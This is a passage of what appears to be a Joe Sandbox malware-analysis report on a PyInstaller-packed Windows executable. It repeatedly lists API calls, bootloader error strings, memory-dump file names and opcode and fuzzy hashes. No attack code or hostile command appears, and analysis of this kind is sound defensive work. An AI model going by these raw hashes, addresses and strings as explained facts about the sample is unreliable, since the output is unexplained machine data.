                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B31A121B1A74291FE12EB06A4407B9A395FF48FA8F994577ED5D07388EF7CE4448231
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                              • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                              • Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                              • Instruction ID: 927f537e46426d2aaace940f905dbf842ef3cc4270607b018656d2f6871e6012
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E417121A1CA8691FA21FB20E4943E9A316FF44358FC001B3EA5C4369DEF7CE509C762
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7EAD0351A,?,00000000,00007FF7EAD03F23), ref: 00007FF7EAD02AA0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                              • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                              • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                              • Instruction ID: f5e54560c04cc6bca7bda04a6944ccef72f7451e5b81d96eeb26d12b1cbd133b
• Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
• Instruction Fuzzy Hash: 29217F72A19B8142F720EB61B8817E6A7A4FB88784F800176FE8D4365DDF7CD245C651
APIs
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
• Instruction ID: 8a3ba129aaf0e41bd238301cd0bc4d9668ea0521642bac162b1e70f298d2df74
• Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
• Instruction Fuzzy Hash: BD215C30E0964281F655F3319652379D396DF687B0F8146B7D93E476DEDD3CA8808222
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
• Instruction ID: 7bd9408958f38dd35ee73b0b19f1becb0e3da1c08a021a71317dd89eae2cf5ae
• Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
• Instruction Fuzzy Hash: 7311B131A18B4282F760EB12E844329A3A4FB88BF4F840275EA5D87798CF7CD814C721
APIs
• GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF7EAD03FB1), ref: 00007FF7EAD08EFD
• K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF7EAD03FB1), ref: 00007FF7EAD08F5A
  • Part of subcall function 00007FF7EAD09390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7EAD045F4,00000000,00007FF7EAD01985), ref: 00007FF7EAD093C9
• K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7EAD03FB1), ref: 00007FF7EAD08FE5
• K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7EAD03FB1), ref: 00007FF7EAD09044
• FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7EAD03FB1), ref: 00007FF7EAD09055
• FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7EAD03FB1), ref: 00007FF7EAD0906A
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
• String ID:
• API String ID: 3462794448-0
• Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
• Instruction ID: 13a75050ef9c01607e677343f9a0904565bb5ea5655d81eefebb84b5324e9fba
• Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
• Instruction Fuzzy Hash: 8241B761A1968281FA30EB61E5803BAB395FB84BC8F840176DF4D5779DDE3CE500C721
APIs
• GetLastError.KERNEL32(?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A,?,?,?,?,00007FF7EAD1718F), ref: 00007FF7EAD1B2D7
• FlsSetValue.KERNEL32(?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A,?,?,?,?,00007FF7EAD1718F), ref: 00007FF7EAD1B30D
• FlsSetValue.KERNEL32(?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A,?,?,?,?,00007FF7EAD1718F), ref: 00007FF7EAD1B33A
• FlsSetValue.KERNEL32(?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A,?,?,?,?,00007FF7EAD1718F), ref: 00007FF7EAD1B34B
• FlsSetValue.KERNEL32(?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A,?,?,?,?,00007FF7EAD1718F), ref: 00007FF7EAD1B35C
• SetLastError.KERNEL32(?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A,?,?,?,?,00007FF7EAD1718F), ref: 00007FF7EAD1B377
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
• Instruction ID: 10b2ff77d91ebd9834225588a6c44b9d8dad45fda4d32e8db72292485a5836d3
• Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
• Instruction Fuzzy Hash: 01114930E0D64282FA58F331964137DD386DF687B0F8446B6E92E476DEDE3CA8518322
APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7EAD01B6A), ref: 00007FF7EAD0295E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentProcess
• String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
• API String ID: 2050909247-2962405886
• Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
• Instruction ID: ae51f5d1fe83f2c971d4e73fef52d4a43429731f2b0db052b25811b2ee4d1c3f
• Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
• Instruction Fuzzy Hash: 2C31CF22B1968152F720E765A8803E6A395FF887D8F800133FE8D8374DEE7CD14AC621
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
• String ID: Unhandled exception in script
• API String ID: 3081866767-2699770090
                                                                                                                                                                                                                              • Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                              • Instruction ID: 7d026c2daf2c81c5c0280fff79927e456b28180bb2e537748e3cb749f588f78a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28316372A19A8189FB20EB21E8553F9A364FF88788F840176EA4D47B5DDF3CD105C721
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7EAD0918F,?,00007FF7EAD03C55), ref: 00007FF7EAD02BA0
                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF7EAD02C2A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentMessageProcess
                                                                                                                                                                                                                              • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                              • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                              • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                              • Instruction ID: da505b91eaedee4c8d100829ab9c4c40a91cdb1d33957f570433fb2b5490e2bc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1721A172708B4142F711EB64F8847EAA3A5FB88784F800136EA8D57659DE3CE245C751
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7EAD01B99), ref: 00007FF7EAD02760
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                              • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                              • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                              • Instruction ID: b3653a7480c60acb36a9dd249aad42a1c08dedfdf0c78cfb7d5841418f6292e5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2217C72A19B8182F720EB60B8817E6A7A4EB88784F800176FA8D4365DDF7CD1498651
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                              • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                              • Instruction ID: 0d68a3035b4517ca4c50f72d4311e48bb8cd06f2c2e59faff72b6f0653c3bdd8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3F0C231B0970681FB10EB20E48437AA320EF55760F940276C66E461ECDF7CE148C331
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                              • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                              • Instruction ID: 1f19412b6e179195adf8c0d28e5bfbfa09cfc95307ff25947d789b3e9eedac2b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2118232E5CB0301FA78B165E4A13799350EF59360E840EB6EA6E163DECE7C6942C132
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF7EAD1A5A3,?,?,00000000,00007FF7EAD1A83E,?,?,?,?,?,00007FF7EAD1A7CA), ref: 00007FF7EAD1B3AF
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7EAD1A5A3,?,?,00000000,00007FF7EAD1A83E,?,?,?,?,?,00007FF7EAD1A7CA), ref: 00007FF7EAD1B3CE
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7EAD1A5A3,?,?,00000000,00007FF7EAD1A83E,?,?,?,?,?,00007FF7EAD1A7CA), ref: 00007FF7EAD1B3F6
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7EAD1A5A3,?,?,00000000,00007FF7EAD1A83E,?,?,?,?,?,00007FF7EAD1A7CA), ref: 00007FF7EAD1B407
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7EAD1A5A3,?,?,00000000,00007FF7EAD1A83E,?,?,?,?,?,00007FF7EAD1A7CA), ref: 00007FF7EAD1B418
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF7EAD0352C,?,00000000,00007FF7EAD03F23), ref: 00007FF7EAD07F32
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateDirectory
                                                                                                                                                                                                                              • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                              • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                              • Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                              • Instruction ID: df1133399f990eec0029a3c2bf0e5599327757a551e291416c3c5cf70455a6bc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9031E821619AC145FA21EB20E4907EAA355EF84BE8F800272EE6D477CDDF3CD6458721
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                              • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                              • API String ID: 2030045667-255084403
                                                                                                                                                                                                                              • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                              • Instruction ID: 372e37d06d474096e91f2fde833aed86e05630f1b0b141587d3e2c14a81d2b76
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF21AE72B08B4182F710EB64F8847EAA3A5FB88784F800136EA8D57659DE3CE245C750
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
